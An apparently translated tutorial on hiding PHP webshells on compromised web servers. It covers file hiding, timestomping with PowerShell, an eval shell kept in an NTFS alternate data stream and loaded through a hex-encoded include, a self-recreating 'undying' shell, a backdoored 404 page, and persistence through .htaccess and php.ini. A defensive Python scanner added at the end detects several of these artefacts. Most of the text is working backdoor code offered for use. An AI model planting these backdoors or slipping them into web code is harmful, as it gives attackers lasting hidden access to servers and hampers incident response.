A Summary of Techniques for Hiding PHP Backdoors

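Preface

If you want a webshell to survive longer, it is not enough for the webshell itself to evade antivirus detection; you also need to pay attention to some hiding techniques, such as hiding the file, modifying its time attributes and hiding the file contents.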

1. Hiding files

The Attrib +s +a +h +r command adds the system, archive, read-only and hidden attributes to the original folder.

REM Hide the shell.php file
attrib +s +a +h +r shell.php

2. Modifying file time attributes

When you try to hide a newly created file among a pile of other files, then besides giving it a misleading file name, you also need to change the file's modification date.

# Change the modification time
Set-ItemProperty -Path 2.txt -Name LastWriteTime -Value "2020-11-01 12:12:12"
# Change the access time
Set-ItemProperty -Path 2.txt -Name LastAccessTime -Value "2020-11-01 12:12:12"
# Change the creation time
Set-ItemProperty -Path 2.txt -Name CreationTime -Value "2020-11-01 12:12:12"

Use this command to read a file's attributes:

Get-ItemProperty -Path D:\1.dll | Format-list -Property * -Force

Change the creation and modification times of all files in a folder:

powershell.exe -command "ls 'upload\*.*' | foreach-object { $_.LastWriteTime = Get-Date ; $_.CreationTime = '2018/01/01 19:00:00' }"

3. Hiding file contents with ADS

Echo a data-stream file onto the server. For example, if index.php is a normal page file, we can do this:

echo ^<?php @eval($_POST['chopper']);?^> > index.php:hidden.jpg

This creates an invisible shell, hidden.jpg. Ordinary file managers and the type, dir and del commands all fail to find hidden.jpg.

Using the include function, hex-encode index.php:hidden.jpg and include this ADS file, so that the one-liner is parsed normally.

<?php @include(PACK('H*','696E6465782E7068703A68696464656E2E6A7067'));?>

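4. The "undying" webshell

An undying webshell deletes itself and, running as a process, recreates a hidden backdoor in a loop.

<?php
set_time_limit(0); 
ignore_user_abort(1); 
unlink(__FILE__); // delete itself
while(1)
{ 
 file_put_contents('shell.php','<?php @eval($_GET[cmd]);?>'); // create shell.php; an AV-evading one-liner is best here
 sleep(10); // interval
}
?>

The simplest and most effective way to deal with it is to restart the service, after which the webshell file can be deleted.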

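5. Middleware backdoor

Copy the compiled .so file into the modules folder, enable the backdoor module and restart Apache. The backdoor is triggered when a string with specific parameters is sent to the server.

GitHub project address: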

https://github.com/VladRico/apache2_BackdoorMod

6. Hiding a backdoor in the 404 page

The 404 page mainly exists to improve the user experience, and it can be used to hide a backdoor file.

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
</body></html>
<?php
@preg_replace("/[pageerror]/e",$_POST['error'],"saft");
header('HTTP/1.1 404 Not Found');
?>

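7. Building a PHP backdoor with an .htaccess file

In general, .htaccess can be used to leave a backdoor and to bypass blacklists. Create an .htaccess file in the upload directory with the following content; it takes effect without a restart, and uploaded png files are then parsed as PHP.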

AddType application/x-httpd-php .png

In addition, a PHP parsing rule can be added to .htaccess so that any file whose name contains 1 is parsed as PHP; an uploaded 1.txt is then parsed.

<FilesMatch "1"> 
SetHandler application/x-httpd-php 
</FilesMatch>

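8. Hiding a backdoor file with php.ini

php.ini can specify files that are automatically parsed before and after the main file executes. This is commonly used for shared page headers and footers, and it can also be used to hide a PHP backdoor.

; Automatically add a file before the PHP document.
auto_prepend_file = "c:\tmp.txt"
; Automatically add a file after the PHP document.
auto_append_file = "c:\tmp.txt"

A service restart is required for this to take effect; after that, requesting any PHP file reaches the webshell.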
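Seen from the defender's side, the artefacts in sections 3, 4, 6, 7 and 8 can be matched statically. The Python script below is an added example, not part of the original article; the rule set, the scan function and the sample file names are assumptions made for illustration, and the sample contents are constructed from the snippets above.

```python
import re

# Static indicators for the artefacts in sections 3, 4, 6, 7 and 8.
# Each rule: (finding label, file-name regex, content regex). Rule set is illustrative.
RULES = [
    ("htaccess maps non-PHP extension to PHP handler", r"\.htaccess$",
     re.compile(r"^\s*(?:AddType|AddHandler)\s+application/x-httpd-php\s+(?!\.php\b)\S+", re.I | re.M)),
    ("htaccess forces PHP handler", r"\.htaccess$",
     re.compile(r"^\s*SetHandler\s+application/x-httpd-php", re.I | re.M)),
    ("php.ini auto-includes a file on every request", r"php\.ini$",
     re.compile(r'^\s*auto_(?:prepend|append)_file[ \t]*=[ \t]*"?[^\s";]+', re.I | re.M)),
    ("preg_replace with /e (code execution) modifier", r"\.php$",
     re.compile(r"preg_replace\s*\(\s*[\"'](.).*?\1[a-z]*e[a-z]*[\"']", re.I)),
    ("script deletes itself and ignores client abort", r"\.php$",
     re.compile(r"ignore_user_abort.*unlink\s*\(\s*__FILE__", re.I | re.S)),
]
# include/require whose argument is pack('H*', '<hex>'): decode it to expose the real target.
HEX_INCLUDE = re.compile(
    r"(?:include|require)(?:_once)?\s*\(?\s*pack\s*\(\s*[\"']H\*[\"']\s*,\s*[\"']((?:[0-9a-f]{2})+)[\"']", re.I)

def scan(name, text):
    """Return the list of findings for one file, given its name and contents."""
    findings = [label for label, name_re, body_re in RULES
                if re.search(name_re, name, re.I) and body_re.search(text)]
    if name.lower().endswith(".php"):
        for m in HEX_INCLUDE.finditer(text):
            target = bytes.fromhex(m.group(1)).decode("latin-1")
            # "file:stream" (colon not part of a drive letter) is NTFS ADS syntax.
            kind = "NTFS alternate data stream" if re.search(r"[^:]{2,}:[^\\/]", target) else "path"
            findings.append(f"include of hex-encoded {kind}: {target}")
    return findings

# Constructed sample inputs, copied from the snippets in this article.
SAMPLES = {
    "upload/.htaccess": 'AddType application/x-httpd-php .png\n<FilesMatch "1">\n'
                        'SetHandler application/x-httpd-php\n</FilesMatch>\n',
    "php.ini": 'auto_prepend_file = "c:\\tmp.txt"\n',
    "index.php": "<?php @include(PACK('H*','696E6465782E7068703A68696464656E2E6A7067'));?>",
    "404.php": '<?php @preg_replace("/[pageerror]/e",$_POST[\'error\'],"saft"); ?>',
    "clean.php": "<?php include('header.php'); echo 'ok'; ?>",
}

if __name__ == "__main__":
    for name, text in SAMPLES.items():
        for finding in scan(name, text):
            print(f"{name}: {finding}")
```

The script reads only each file's default data stream, so it reports the include that references an ADS, not the stream's contents. On NTFS the streams themselves are enumerated with dir /r or Get-Item -Stream *.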
